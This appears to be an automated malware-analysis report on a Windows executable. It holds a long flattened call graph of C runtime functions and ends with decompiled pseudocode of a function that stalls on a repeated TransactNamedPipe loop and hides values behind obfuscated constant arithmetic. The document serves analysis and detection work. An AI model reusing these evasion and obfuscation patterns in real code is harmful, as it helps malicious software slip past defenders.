40747b _puts 68 API calls 10002->10006 10024 408577 10003->10024 10004->9985 10008 408d56 10006->10008 10007 408d49 10083 408d7c 10007->10083 10009 40748e __free_osfhnd 68 API calls 10008->10009 10009->10007 10012 40bcf7 __getptd_noexit 68 API calls 10011->10012 10013 407493 10012->10013 10013->9996 10015 40e415 _puts 10014->10015 10016 40e470 10015->10016 10019 407670 __lock 68 API calls 10015->10019 10017 40e492 _puts 10016->10017 10018 40e475 EnterCriticalSection 10016->10018 10017->10000 10018->10017 10020 40e441 10019->10020 10021 40e458 10020->10021 10023 40c782 __getstream InitializeCriticalSectionAndSpinCount 10020->10023 10086 40e4a0 10021->10086 10023->10021 10025 408586 __write_nolock 10024->10025 10026 4085b8 10025->10026 10027 4085df 10025->10027 10057 4085ad 10025->10057 10029 40748e __free_osfhnd 68 API calls 10026->10029 10030 408647 10027->10030 10031 408621 10027->10031 10028 40dac5 __atodbl_l 5 API calls 10032 408ca8 10028->10032 10033 4085bd 10029->10033 10035 40865b 10030->10035 10090 40e0be 10030->10090 10034 40748e __free_osfhnd 68 API calls 10031->10034 10032->10007 10036 40747b _puts 68 API calls 10033->10036 10037 408626 10034->10037 10040 40e05a __write_nolock 68 API calls 10035->10040 10039 4085c4 10036->10039 10041 40747b _puts 68 API calls 10037->10041 10042 409867 _puts 6 API calls 10039->10042 10043 408666 10040->10043 10045 40862f 10041->10045 10042->10057 10044 40890c 10043->10044 10049 40bd70 __getptd 68 API calls 10043->10049 10047 408bdb WriteFile 10044->10047 10048 40891c 10044->10048 10046 409867 _puts 6 API calls 10045->10046 10046->10057 10053 408c0e GetLastError 10047->10053 10073 4088ee 10047->10073 10050 408930 10048->10050 10051 4089fa 10048->10051 10052 408681 GetConsoleMode 10049->10052 10054 408c59 10050->10054 10060 40899e WriteFile 10050->10060 10050->10073 10072 408a09 10051->10072 10076 408ada 10051->10076 10052->10044 10055 4086ac 10052->10055 10053->10073 10054->10057 10058 40747b _puts 68 API calls 10054->10058 10055->10044 10056 4086be GetConsoleCP 10055->10056 10056->10073 10077 4086e1 10056->10077 10057->10028 10061 408c7c 10058->10061 10059 408c2c 10063 408c37 10059->10063 10064 408c4b 10059->10064 10060->10050 10060->10053 10068 40748e __free_osfhnd 68 API calls 10061->10068 10062 408b40 WideCharToMultiByte 10062->10053 10065 408b77 WriteFile 10062->10065 10069 40747b _puts 68 API calls 10063->10069 10103 4074a1 10064->10103 10070 408bae GetLastError 10065->10070 10065->10076 10066 408a7e WriteFile 10066->10053 10066->10072 10068->10057 10071 408c3c 10069->10071 10070->10076 10074 40748e __free_osfhnd 68 API calls 10071->10074 10072->10054 10072->10066 10072->10073 10073->10054 10073->10057 10073->10059 10074->10057 10076->10054 10076->10062 10076->10065 10076->10073 10077->10053 10077->10073 10078 40de19 11 API calls __putwch_nolock 10077->10078 10079 40878d WideCharToMultiByte 10077->10079 10080 40dff5 80 API calls __fassign 10077->10080 10082 408812 WriteFile 10077->10082 10100 40e047 10077->10100 10078->10077 10079->10073 10081 4087be WriteFile 10079->10081 10080->10077 10081->10053 10081->10077 10082->10053 10082->10077 10121 40e4a9 LeaveCriticalSection 10083->10121 10085 408d84 10085->10004 10089 407596 LeaveCriticalSection 10086->10089 10088 40e4a7 10088->10016 10089->10088 10108 40e392 10090->10108 10092 40e0dc 10093 40e0e4 10092->10093 10094 40e0f5 SetFilePointer 10092->10094 10096 40747b _puts 68 API calls 10093->10096 10095 40e10d GetLastError 10094->10095 10098 40e0e9 10094->10098 10097 40e117 10095->10097 10095->10098 10096->10098 10099 4074a1 __dosmaperr 68 API calls 10097->10099 10098->10035 10099->10098 10101 40e00f __isleadbyte_l 78 API calls 10100->10101 10102 40e056 10101->10102 10102->10077 10104 40748e __free_osfhnd 68 API calls 10103->10104 10105 4074ac _realloc 10104->10105 10106 40747b _puts 68 API calls 10105->10106 10107 4074bf 10106->10107 10107->10057 10109 40e3b7 10108->10109 10110 40e39f 10108->10110 10112 40748e __free_osfhnd 68 API calls 10109->10112 10114 40e3fc 10109->10114 10111 40748e __free_osfhnd 68 API calls 10110->10111 10113 40e3a4 10111->10113 10115 40e3e5 10112->10115 10116 40747b _puts 68 API calls 10113->10116 10114->10092 10117 40747b _puts 68 API calls 10115->10117 10118 40e3ac 10116->10118 10119 40e3ec 10117->10119 10118->10092 10120 409867 _puts 6 API calls 10119->10120 10120->10114 10121->10085 10123 409013 LeaveCriticalSection 10122->10123 10124 408ff4 10122->10124 10123->9970 10124->10123 10125 408ffb 10124->10125 10128 407596 LeaveCriticalSection 10125->10128 10127 409010 10127->9970 10128->10127 10130 408fd4 EnterCriticalSection 10129->10130 10131 408fbe 10129->10131 10130->9535 10132 407670 __lock 68 API calls 10131->10132 10133 408fc7 10132->10133 10133->9535 10135 4066e3 _puts 10134->10135 10138 40901f 10135->10138 10137 4066ee 10137->9537 10139 409042 LeaveCriticalSection 10138->10139 10140 40902f 10138->10140 10139->10137 10143 407596 LeaveCriticalSection 10140->10143 10142 40903f 10142->10137 10143->10142 10147 406537 _puts 10144->10147 10145 40654a 10146 40747b _puts 68 API calls 10145->10146 10148 40654f 10146->10148 10147->10145 10149 40657f 10147->10149 10150 409867 _puts 6 API calls 10148->10150 10163 4095f8 10149->10163 10153 40655f _puts @_EH4_CallFilterFunc@8 10150->10153 10152 406584 10154 406598 10152->10154 10155 40658b 10152->10155 10153->9550 10157 4065bf 10154->10157 10158 40659f 10154->10158 10156 40747b _puts 68 API calls 10155->10156 10156->10153 10181 40932f 10157->10181 10159 40747b _puts 68 API calls 10158->10159 10159->10153 10164 409604 _puts 10163->10164 10165 407670 __lock 68 API calls 10164->10165 10175 409612 10165->10175 10166 409687 10206 409727 10166->10206 10167 40968e 10169 40d677 __malloc_crt 68 API calls 10167->10169 10171 409698 10169->10171 10170 40971c _puts 10170->10152 10171->10166 10173 40c782 __getstream InitializeCriticalSectionAndSpinCount 10171->10173 10172 408fb1 _puts 69 API calls 10172->10175 10176 4096bd 10173->10176 10174 4075ad __mtinitlocknum 68 API calls 10174->10175 10175->10166 10175->10167 10175->10172 10175->10174 10180 40901f __getstream 2 API calls 10175->10180 10177 4096c8 10176->10177 10178 4096db EnterCriticalSection 10176->10178 10179 40617d __fclose_nolock 68 API calls 10177->10179 10178->10166 10179->10166 10180->10175 10182 409351 10181->10182 10183 409365 10182->10183 10193 409384 10182->10193 10184 40747b _puts 68 API calls 10183->10184 10185 40936a 10184->10185 10186 409867 _puts 6 API calls 10185->10186 10192 4065ca 10186->10192 10187 4095b1 10216 40fa90 10187->10216 10188 409597 10189 40747b _puts 68 API calls 10188->10189 10191 40959c 10189->10191 10194 409867 _puts 6 API calls 10191->10194 10203 4065e5 10192->10203 10193->10188 10202 409541 10193->10202 10210 40fe5f 10193->10210 10194->10192 10199 40fcdb __fassign 103 API calls 10200 40955a 10199->10200 10201 40fcdb __fassign 103 API calls 10200->10201 10200->10202 10201->10202 10202->10187 10202->10188 10204 408fe3 _fseek 2 API calls 10203->10204 10205 4065ed 10204->10205 10205->10153 10209 407596 LeaveCriticalSection 10206->10209 10208 40972e 10208->10170 10209->10208 10219 40fcf5 10210->10219 10212 40950c 10212->10188 10213 40fcdb 10212->10213 10232 40fab0 10213->10232 10272 40f9c4 10216->10272 10218 40faab 10218->10192 10220 40fd0c 10219->10220 10231 40fd05 _strncmp 10219->10231 10221 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10220->10221 10222 40fd18 10221->10222 10223 40fd76 10222->10223 10224 40fd4b 10222->10224 10222->10231 10227 40747b _puts 68 API calls 10223->10227 10223->10231 10225 40747b _puts 68 API calls 10224->10225 10226 40fd50 10225->10226 10228 409867 _puts 6 API calls 10226->10228 10229 40fd83 10227->10229 10228->10231 10230 409867 _puts 6 API calls 10229->10230 10230->10231 10231->10212 10233 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10232->10233 10234 40fac4 10233->10234 10235 40fae6 10234->10235 10236 40fb0c 10234->10236 10246 40953a 10234->10246 10247 412de8 10235->10247 10238 40fb11 10236->10238 10239 40fb3f 10236->10239 10240 40747b _puts 68 API calls 10238->10240 10242 40747b _puts 68 API calls 10239->10242 10239->10246 10241 40fb16 10240->10241 10243 409867 _puts 6 API calls 10241->10243 10244 40fb4c 10242->10244 10243->10246 10245 409867 _puts 6 API calls 10244->10245 10245->10246 10246->10199 10246->10202 10249 412df8 10247->10249 10254 412e2a 10247->10254 10248 412dfd 10251 40747b _puts 68 API calls 10248->10251 10249->10248 10249->10254 10253 412e02 10251->10253 10252 412e12 10252->10246 10255 409867 _puts 6 API calls 10253->10255 10256 412cf6 10254->10256 10255->10252 10257 412d0c 10256->10257 10267 412d31 ___ascii_strnicmp 10256->10267 10258 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10257->10258 10259 412d17 10258->10259 10260 412d1c 10259->10260 10261 412d51 10259->10261 10262 40747b _puts 68 API calls 10260->10262 10263 412d5b 10261->10263 10271 412d83 10261->10271 10264 412d21 10262->10264 10266 40747b _puts 68 API calls 10263->10266 10265 409867 _puts 6 API calls 10264->10265 10265->10267 10269 412d60 10266->10269 10267->10252 10268 412e7d 103 API calls __tolower_l 10268->10271 10270 409867 _puts 6 API calls 10269->10270 10270->10267 10271->10267 10271->10268 10275 40f9d0 _puts 10272->10275 10273 40f9e3 10274 40747b _puts 68 API calls 10273->10274 10276 40f9e8 10274->10276 10275->10273 10277 40fa21 10275->10277 10278 409867 _puts 6 API calls 10276->10278 10283 40f2a5 10277->10283 10282 40f9f7 _puts 10278->10282 10282->10218 10284 40f2ca 10283->10284 10343 412cbd 10284->10343 10287 40973f __invoke_watson 10 API calls 10289 40f2f5 10287->10289 10288 40f32e 10290 40748e __free_osfhnd 68 API calls 10288->10290 10289->10288 10295 40f3ee 10289->10295 10291 40f333 10290->10291 10292 40747b _puts 68 API calls 10291->10292 10293 40f33d 10292->10293 10294 409867 _puts 6 API calls 10293->10294 10323 40f34c 10294->10323 10349 40e4d0 10295->10349 10297 40f490 10298 40f4b1 CreateFileA 10297->10298 10299 40f497 10297->10299 10301 40f54b GetFileType 10298->10301 10302 40f4de 10298->10302 10300 40748e __free_osfhnd 68 API calls 10299->10300 10305 40f49c 10300->10305 10303 40f558 GetLastError 10301->10303 10304 40f59c 10301->10304 10306 40f517 GetLastError 10302->10306 10309 40f4f2 CreateFileA 10302->10309 10307 4074a1 __dosmaperr 68 API calls 10303->10307 10367 40e28b 10304->10367 10308 40747b _puts 68 API calls 10305->10308 10310 4074a1 __dosmaperr 68 API calls 10306->10310 10311 40f581 CloseHandle 10307->10311 10312 40f4a6 10308->10312 10309->10301 10309->10306 10310->10312 10311->10312 10313 40f58f 10311->10313 10316 40747b _puts 68 API calls 10312->10316 10315 40747b _puts 68 API calls 10313->10315 10315->10312 10316->10323 10317 40f7da 10320 40f947 CloseHandle CreateFileA 10317->10320 10317->10323 10322 40f972 GetLastError 10320->10322 10320->10323 10324 4074a1 __dosmaperr 68 API calls 10322->10324 10339 40fa62 10323->10339 10327 40f97e 10324->10327 10325 40748e __free_osfhnd 68 API calls 10334 40f630 10325->10334 10326 4124d6 78 API calls __read_nolock 10326->10334 10432 40e30c 10327->10432 10329 40b7bb 70 API calls __lseek_nolock 10329->10334 10332 408caa __locking 102 API calls 10332->10334 10333 40f842 10335 412a98 __close_nolock 71 API calls 10333->10335 10334->10317 10334->10326 10334->10329 10334->10332 10334->10333 10337 40e0be 70 API calls __lseeki64_nolock 10334->10337 10386 412a98 10334->10386 10401 412320 10334->10401 10336 40f849 10335->10336 10338 40747b _puts 68 API calls 10336->10338 10337->10334 10338->10323 10340 40fa67 10339->10340 10341 40fa8e 10339->10341 10449 40e4a9 LeaveCriticalSection 10340->10449 10341->10282 10344 412ccc 10343->10344 10348 40f2e6 10343->10348 10345 40747b _puts 68 API calls 10344->10345 10346 412cd1 10345->10346 10347 409867 _puts 6 API calls 10346->10347 10347->10348 10348->10287 10348->10289 10350 40e4dc _puts 10349->10350 10351 4075ad __mtinitlocknum 68 API calls 10350->10351 10352 40e4ec 10351->10352 10353 407670 __lock 68 API calls 10352->10353 10354 40e4f1 _puts 10352->10354 10362 40e500 10353->10362 10354->10297 10355 40e5d9 10357 40d6bc __calloc_crt 68 API calls 10355->10357 10361 40e5e2 10357->10361 10358 40e581 EnterCriticalSection 10360 40e591 LeaveCriticalSection 10358->10360 10358->10362 10359 407670 __lock 68 API calls 10359->10362 10360->10362 10363 40e409 ___lock_fhandle 69 API calls 10361->10363 10366 40e643 10361->10366 10362->10355 10362->10358 10362->10359 10364 40c782 __getstream InitializeCriticalSectionAndSpinCount 10362->10364 10362->10366 10441 40e5a3 10362->10441 10363->10366 10364->10362 10444 40e661 10366->10444 10368 40e2f2 10367->10368 10369 40e299 10367->10369 10370 40747b _puts 68 API calls 10368->10370 10369->10368 10374 40e2bd 10369->10374 10371 40e2f7 10370->10371 10372 40748e __free_osfhnd 68 API calls 10371->10372 10373 40e2e8 10372->10373 10373->10317 10373->10334 10376 40b7bb 10373->10376 10374->10373 10375 40e2e2 SetStdHandle 10374->10375 10375->10373 10377 40e392 __lseeki64_nolock 68 API calls 10376->10377 10378 40b7ca 10377->10378 10379 40b7e0 SetFilePointer 10378->10379 10380 40b7d0 10378->10380 10382 40b7f7 GetLastError 10379->10382 10383 40b7ff 10379->10383 10381 40747b _puts 68 API calls 10380->10381 10384 40b7d5 10381->10384 10382->10383 10383->10384 10385 4074a1 __dosmaperr 68 API calls 10383->10385 10384->10325 10384->10334 10385->10384 10387 40e392 __lseeki64_nolock 68 API calls 10386->10387 10390 412aa8 10387->10390 10388 412afe 10389 40e30c __free_osfhnd 69 API calls 10388->10389 10393 412b06 10389->10393 10390->10388 10391 412adc 10390->10391 10394 40e392 __lseeki64_nolock 68 API calls 10390->10394 10391->10388 10392 40e392 __lseeki64_nolock 68 API calls 10391->10392 10396 412ae8 CloseHandle 10392->10396 10397 412b28 10393->10397 10400 4074a1 __dosmaperr 68 API calls 10393->10400 10395 412ad3 10394->10395 10398 40e392 __lseeki64_nolock 68 API calls 10395->10398 10396->10388 10399 412af4 GetLastError 10396->10399 10397->10334 10398->10391 10399->10388 10400->10397 10402 40e0be __lseeki64_nolock 70 API calls 10401->10402 10403 41233f 10402->10403 10404 4123a2 10403->10404 10405 40e0be __lseeki64_nolock 70 API calls 10403->10405 10406 40747b _puts 68 API calls 10404->10406 10407 4123ad 10404->10407 10410 41235b 10405->10410 10406->10407 10407->10334 10408 41243d 10414 40e0be __lseeki64_nolock 70 API calls 10408->10414 10428 4124a6 10408->10428 10409 412381 GetProcessHeap HeapAlloc 10411 41239d 10409->10411 10418 4123b4 __setmode_nolock 10409->10418 10410->10404 10410->10408 10410->10409 10413 40747b _puts 68 API calls 10411->10413 10412 40e0be __lseeki64_nolock 70 API calls 10412->10404 10413->10404 10415 412456 10414->10415 10415->10404 10416 40e392 __lseeki64_nolock 68 API calls 10415->10416 10417 41246c SetEndOfFile 10416->10417 10419 412489 10417->10419 10417->10428 10420 408577 __write_nolock 100 API calls 10418->10420 10423 412420 10418->10423 10431 4123f7 __setmode_nolock 10418->10431 10421 40747b _puts 68 API calls 10419->10421 10420->10418 10422 41248e 10421->10422 10425 40748e __free_osfhnd 68 API calls 10422->10425 10424 40748e __free_osfhnd 68 API calls 10423->10424 10426 412425 10424->10426 10427 412499 GetLastError 10425->10427 10430 40747b _puts 68 API calls 10426->10430 10426->10431 10427->10428 10428->10404 10428->10412 10429 412405 GetProcessHeap HeapFree 10429->10428 10430->10431 10431->10429 10433 40e378 10432->10433 10434 40e31d 10432->10434 10435 40747b _puts 68 API calls 10433->10435 10434->10433 10439 40e348 10434->10439 10436 40e37d 10435->10436 10437 40748e __free_osfhnd 68 API calls 10436->10437 10438 40e36e 10437->10438 10438->10323 10439->10438 10440 40e368 SetStdHandle 10439->10440 10440->10438 10447 407596 LeaveCriticalSection 10441->10447 10443 40e5aa 10443->10362 10448 407596 LeaveCriticalSection 10444->10448 10446 40e668 10446->10354 10447->10443 10448->10446 10449->10341 10451 4063e0 _puts 10450->10451 10452 407670 __lock 68 API calls 10451->10452 10459 4063ef 10452->10459 10453 406487 10476 4064a5 10453->10476 10455 408fb1 _puts 69 API calls 10455->10459 10456 406493 _puts 10456->9564 10458 40638c 106 API calls __fflush_nolock 10458->10459 10459->10453 10459->10455 10459->10458 10473 406476 10459->10473 10461 4063a2 10460->10461 10462 406399 10460->10462 10464 406324 __flush 102 API calls 10461->10464 10463 4063d4 _flsall 106 API calls 10462->10463 10466 40639f 10463->10466 10465 4063a8 10464->10465 10465->10466 10467 408d86 __fileno 68 API calls 10465->10467 10470 4064f7 10466->10470 10468 4063c1 10467->10468 10480 408db8 10468->10480 10471 408fe3 _fseek 2 API calls 10470->10471 10472 4064ff 10471->10472 10472->9564 10474 40901f __getstream 2 API calls 10473->10474 10475 406484 10474->10475 10475->10459 10479 407596 LeaveCriticalSection 10476->10479 10478 4064ac 10478->10456 10479->10478 10481 408dc4 _puts 10480->10481 10482 408dcc 10481->10482 10483 408ddf 10481->10483 10484 40747b _puts 68 API calls 10482->10484 10485 408ded 10483->10485 10488 408e27 10483->10488 10491 408dd1 _puts 10484->10491 10486 40747b _puts 68 API calls 10485->10486 10487 408df2 10486->10487 10490 409867 _puts 6 API calls 10487->10490 10489 40e409 ___lock_fhandle 69 API calls 10488->10489 10492 408e2d 10489->10492 10490->10491 10491->10466 10493 408e66 10492->10493 10494 40e392 __lseeki64_nolock 68 API calls 10492->10494 10495 40747b _puts 68 API calls 10493->10495 10496 408e42 FlushFileBuffers 10494->10496 10497 408e70 10495->10497 10498 408e59 10496->10498 10499 408e4e GetLastError 10496->10499 10502 408e8f 10497->10502 10498->10497 10501 40748e __free_osfhnd 68 API calls 10498->10501 10499->10498 10501->10493 10505 40e4a9 LeaveCriticalSection 10502->10505 10504 408e97 10504->10491 10505->10504 10507 406ac9 10506->10507 10508 406ab9 10506->10508 10510 406adb 10507->10510 10521 40b90c 10507->10521 10509 40747b _puts 68 API calls 10508->10509 10513 406abe 10509->10513 10511 406324 __flush 102 API calls 10510->10511 10514 406ae9 10511->10514 10518 406bae 10513->10518 10515 408d86 __fileno 68 API calls 10514->10515 10516 406b1b 10515->10516 10538 40b830 10516->10538 10519 408fe3 _fseek 2 API calls 10518->10519 10520 406bb6 10519->10520 10520->9575 10522 40b93f 10521->10522 10523 40b91f 10521->10523 10525 408d86 __fileno 68 API calls 10522->10525 10524 40747b _puts 68 API calls 10523->10524 10527 40b924 10524->10527 10526 40b945 10525->10526 10529 40b830 __locking 72 API calls 10526->10529 10528 409867 _puts 6 API calls 10527->10528 10537 40b934 10528->10537 10530 40b95a 10529->10530 10531 40b9ce 10530->10531 10533 40b989 10530->10533 10530->10537 10532 40747b _puts 68 API calls 10531->10532 10532->10537 10534 40b830 __locking 72 API calls 10533->10534 10533->10537 10535 40ba29 10534->10535 10536 40b830 __locking 72 API calls 10535->10536 10535->10537 10536->10537 10537->10510 10539 40b83c _puts 10538->10539 10540 40b844 10539->10540 10541 40b85f 10539->10541 10542 40748e __free_osfhnd 68 API calls 10540->10542 10543 40b86d 10541->10543 10546 40b8ae 10541->10546 10544 40b849 10542->10544 10545 40748e __free_osfhnd 68 API calls 10543->10545 10547 40747b _puts 68 API calls 10544->10547 10548 40b872 10545->10548 10549 40e409 ___lock_fhandle 69 API calls 10546->10549 10558 40b851 _puts 10547->10558 10550 40747b _puts 68 API calls 10548->10550 10551 40b8b4 10549->10551 10552 40b879 10550->10552 10553 40b8c1 10551->10553 10554 40b8d7 10551->10554 10555 409867 _puts 6 API calls 10552->10555 10556 40b7bb __lseek_nolock 70 API calls 10553->10556 10557 40747b _puts 68 API calls 10554->10557 10555->10558 10559 40b8cf 10556->10559 10560 40b8dc 10557->10560 10558->10513 10563 40b902 10559->10563 10561 40748e __free_osfhnd 68 API calls 10560->10561 10561->10559 10566 40e4a9 LeaveCriticalSection 10563->10566 10565 40b90a 10565->10558 10566->10565 10568 40606d 10567->10568 10571 407364 __ctrlfp __floor_pentium4 10567->10571 10569 40609e 10568->10569 10568->10571 10576 4060e8 10569->10576 10578 4070a0 10569->10578 10570 4073d1 __floor_pentium4 10575 4073be __ctrlfp 10570->10575 10594 40d341 10570->10594 10571->10570 10574 4073ae 10571->10574 10571->10575 10587 40d2ec 10574->10587 10575->9580 10576->9580 10579 4070d6 10578->10579 10583 4070e1 10578->10583 10580 40bb24 __decode_pointer 6 API calls 10579->10580 10580->10583 10581 4071b8 10582 407174 10581->10582 10585 40747b _puts 68 API calls 10581->10585 10582->10576 10583->10581 10583->10582 10584 407132 10583->10584 10584->10582 10586 40747b _puts 68 API calls 10584->10586 10585->10582 10586->10582 10588 40d322 10587->10588 10589 40d2fa 10587->10589 10591 40747b _puts 68 API calls 10588->10591 10605 40d24c 10589->10605 10593 40d327 __ctrlfp 10591->10593 10592 40d31d 10592->10575 10593->10575 10595 40d377 __handle_exc 10594->10595 10596 40d39d __except1 10595->10596 10620 40cfe6 10595->10620 10598 40d3df 10596->10598 10599 40d3b8 10596->10599 10600 40d1eb __except1 68 API calls 10598->10600 10601 40d24c __umatherr 68 API calls 10599->10601 10602 40d3da __ctrlfp 10600->10602 10601->10602 10603 40dac5 __atodbl_l 5 API calls 10602->10603 10604 40d403 10603->10604 10604->10575 10606 40d256 10605->10606 10607 40d271 __87except __ctrlfp 10606->10607 10608 40d2cf __ctrlfp 10606->10608 10611 40d2bf 10607->10611 10613 40d1eb 10607->10613 10609 40d1eb __except1 68 API calls 10608->10609 10610 40d2e4 10609->10610 10610->10592 10611->10592 10614 40d20b 10613->10614 10616 40d1f6 10613->10616 10615 40747b _puts 68 API calls 10614->10615 10617 40d210 10615->10617 10616->10617 10618 40747b _puts 68 API calls 10616->10618 10617->10611 10619 40d203 10618->10619 10619->10611 10623 40cd0a 10620->10623 10624 40cd31 __raise_exc_ex 10623->10624 10625 40cf24 RaiseException 10624->10625 10626 40cf3d 10625->10626 10626->10596 10629 40b5db 10627->10629 10634 40b5fc 10627->10634 10628 40b5e7 10630 40747b _puts 68 API calls 10628->10630 10629->10628 10629->10634 10637 40b61a _realloc 10629->10637 10631 40b5ec 10630->10631 10632 409867 _puts 6 API calls 10631->10632 10632->10634 10633 40b465 __flsbuf 102 API calls 10633->10637 10634->9596 10635 406324 __flush 102 API calls 10635->10637 10636 408d86 __fileno 68 API calls 10636->10637 10637->10633 10637->10634 10637->10635 10637->10636 10638 408caa __locking 102 API calls 10637->10638 10638->10637 10640 408d86 __fileno 68 API calls 10639->10640 10641 40b475 10640->10641 10642 40b480 10641->10642 10643 40b497 10641->10643 10645 40747b _puts 68 API calls 10642->10645 10644 40b49b 10643->10644 10654 40b4a8 _puts 10643->10654 10646 40747b _puts 68 API calls 10644->10646 10653 40b485 10645->10653 10646->10653 10647 40b509 10648 40b598 10647->10648 10649 40b518 10647->10649 10650 408caa __locking 102 API calls 10648->10650 10651 40b52f 10649->10651 10657 40b54c 10649->10657 10650->10653 10652 408caa __locking 102 API calls 10651->10652 10652->10653 10653->9601 10654->10647 10654->10653 10655 40e05a __write_nolock 68 API calls 10654->10655 10656 40b4fe 10654->10656 10655->10656 10656->10647 10664 411040 10656->10664 10657->10653 10667 40e143 10657->10667 10661 406a9b _puts 10660->10661 10662 40901f __getstream 2 API calls 10661->10662 10663 406aa6 10662->10663 10663->9590 10665 40d677 __malloc_crt 68 API calls 10664->10665 10666 411055 10665->10666 10666->10647 10668 40e14f _puts 10667->10668 10669 40e160 10668->10669 10670 40e17c 10668->10670 10671 40748e __free_osfhnd 68 API calls 10669->10671 10672 40e18a 10670->10672 10674 40e1ab 10670->10674 10673 40e165 10671->10673 10675 40748e __free_osfhnd 68 API calls 10672->10675 10678 40747b _puts 68 API calls 10673->10678 10676 40e1f1 10674->10676 10677 40e1cb 10674->10677 10679 40e18f 10675->10679 10682 40e409 ___lock_fhandle 69 API calls 10676->10682 10681 40748e __free_osfhnd 68 API calls 10677->10681 10693 40e16d _puts 10678->10693 10680 40747b _puts 68 API calls 10679->10680 10683 40e196 10680->10683 10684 40e1d0 10681->10684 10685 40e1f7 10682->10685 10686 409867 _puts 6 API calls 10683->10686 10687 40747b _puts 68 API calls 10684->10687 10688 40e220 10685->10688 10689 40e204 10685->10689 10686->10693 10692 40e1d7 10687->10692 10691 40747b _puts 68 API calls 10688->10691 10690 40e0be __lseeki64_nolock 70 API calls 10689->10690 10694 40e215 10690->10694 10695 40e225 10691->10695 10696 409867 _puts 6 API calls 10692->10696 10693->10653 10699 40e252 10694->10699 10697 40748e __free_osfhnd 68 API calls 10695->10697 10696->10693 10697->10694 10702 40e4a9 LeaveCriticalSection 10699->10702 10701 40e25a 10701->10693 10702->10701 10704 406d38 _puts 10703->10704 10705 407670 __lock 68 API calls 10704->10705 10706 406d3f 10705->10706 10708 40bb24 __decode_pointer 6 API calls 10706->10708 10712 406df8 __initterm 10706->10712 10710 406d76 10708->10710 10710->10712 10714 40bb24 __decode_pointer 6 API calls 10710->10714 10711 406e40 _puts 10711->8973 10720 406e43 10712->10720 10718 406d8b 10714->10718 10715 406e37 10716 406c3c _fast_error_exit 3 API calls 10715->10716 10716->10711 10717 40bb1b 7 API calls __init_pointers 10717->10718 10718->10712 10718->10717 10719 40bb24 6 API calls __decode_pointer 10718->10719 10719->10718 10721 406e24 10720->10721 10722 406e49 10720->10722 10721->10711 10724 407596 LeaveCriticalSection 10721->10724 10725 407596 LeaveCriticalSection 10722->10725 10724->10715 10725->10721 10726 40bb1b 10727 40baa9 __encode_pointer 7 API calls 10726->10727 10728 40bb22 10727->10728

                          Control-flow Graph

                          C-Code - Quality: 80%
                          			E004058A1(void* __fp0) {
                          				signed int _v16;
                          				void* _v20;
                          				signed int _v36;
                          				long _v52;
                          				intOrPtr _v56;
                          				char _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				intOrPtr _v88;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				intOrPtr _v100;
                          				intOrPtr _v104;
                          				intOrPtr _v108;
                          				intOrPtr _v112;
                          				intOrPtr _v116;
                          				intOrPtr _v120;
                          				intOrPtr _v124;
                          				intOrPtr _v128;
                          				intOrPtr _v132;
                          				intOrPtr _v136;
                          				intOrPtr _v140;
                          				intOrPtr _v144;
                          				intOrPtr _v148;
                          				intOrPtr _v152;
                          				intOrPtr _v156;
                          				intOrPtr _v160;
                          				intOrPtr _v164;
                          				intOrPtr _v168;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t365;
                          				intOrPtr* _t381;
                          				intOrPtr* _t384;
                          				void* _t387;
                          				void* _t390;
                          				void* _t394;
                          				void* _t395;
                          				void* _t397;
                          				signed int _t403;
                          				signed int _t404;
                          				void* _t405;
                          				intOrPtr* _t406;
                          				void* _t412;
                          
                          				_t412 = __fp0;
                          				_t404 = _t403 & 0xfffffff8;
                          				_push(0xffffffff);
                          				_push(E00416C51);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t404;
                          				_t405 = _t404 - 0x9c;
                          				_t397 = 0xe3a7;
                          				do {
                          					GetLastError();
                          					TransactNamedPipe(0, 0, 0, 0, 0, 0, 0); // executed
                          					_t397 = _t397 - 1;
                          				} while (_t397 != 0);
                          				_v76 = 0x812ae72;
                          				_v108 = 0x374ff37f;
                          				_v144 = 0x53039ceb;
                          				_v88 = 0x26f83b54;
                          				_v152 = 0x2c845f70;
                          				_v64 = 0x664b1a94;
                          				_v56 = 0x2038cb82;
                          				_v104 = 0x18f219b6;
                          				_v124 = 0x52833b47;
                          				_v92 = 0x24568fa0;
                          				_v112 = 0xc292fcb;
                          				_v68 = 0x310707b5;
                          				_v60 = 0x7eccb7a1;
                          				_v128 = 0x51beb4a8;
                          				_v148 = 0x23570ec5;
                          				_v96 = 0x13bb2b31;
                          				_v140 = 0x41e4b1e5;
                          				_v164 = 0x29829f26;
                          				_v120 = 0x6640d5e5;
                          				_v100 = 0x2b35ebd4;
                          				_v72 = 0x304a9f21;
                          				_v156 = 0x42da8ef7;
                          				_v116 = 0x6e9395e5;
                          				_v160 = 0x4663bccc;
                          				_v168 = 0xd57d1e7;
                          				_v80 = 0x58efb44f;
                          				_v136 = 0x146317d6;
                          				_v84 = 0x1f0b1819;
                          				_v132 = 0x3d33338;
                          				_v76 = _v76 + 0x653b0d1e;
                          				_v76 = _v76 - 0x1af0d3ea;
                          				_v76 = _v76 + 0x398a55da;
                          				_v144 = _v144 - 0x684b7b80;
                          				_v76 = _v76 - 0x230a939f;
                          				_v144 = _v144 + 0x59c55b6e;
                          				_v144 = _v144 + 0x3e4b2e5f;
                          				_v144 = _v144 - 0x533debbd;
                          				_v76 = _v76 - 0x4694b7b0;
                          				_v108 = _v108 + 0x64d2b886;
                          				_v144 = _v144 + 0x24a8487e;
                          				_v108 = _v108 + 0x346d58dd;
                          				_v76 = _v76 - 0x41db75c6;
                          				_v108 = _v108 + 0x6d280e28;
                          				_v108 = _v108 - 0x7da0931;
                          				_v76 = _v76 + 0x694bfc10;
                          				_v108 = _v108 - 0xc4a1537;
                          				_v76 = _v76 - 0x37c54368;
                          				_v144 = _v144 - 0x2c7f8551;
                          				_v76 = _v76 - 0x3fa9e949;
                          				_v108 = _v108 + 0x791148db;
                          				_v108 = _v108 + 0x138bf3c6;
                          				_v144 = _v144 - 0x61a2b58f;
                          				_v108 = _v108 - 0x208df69e;
                          				_v144 = _v144 - 0x497a7bc8;
                          				_v108 = _v108 - 0x1af05f9e;
                          				_v108 = _v108 - 0x6b3af13b;
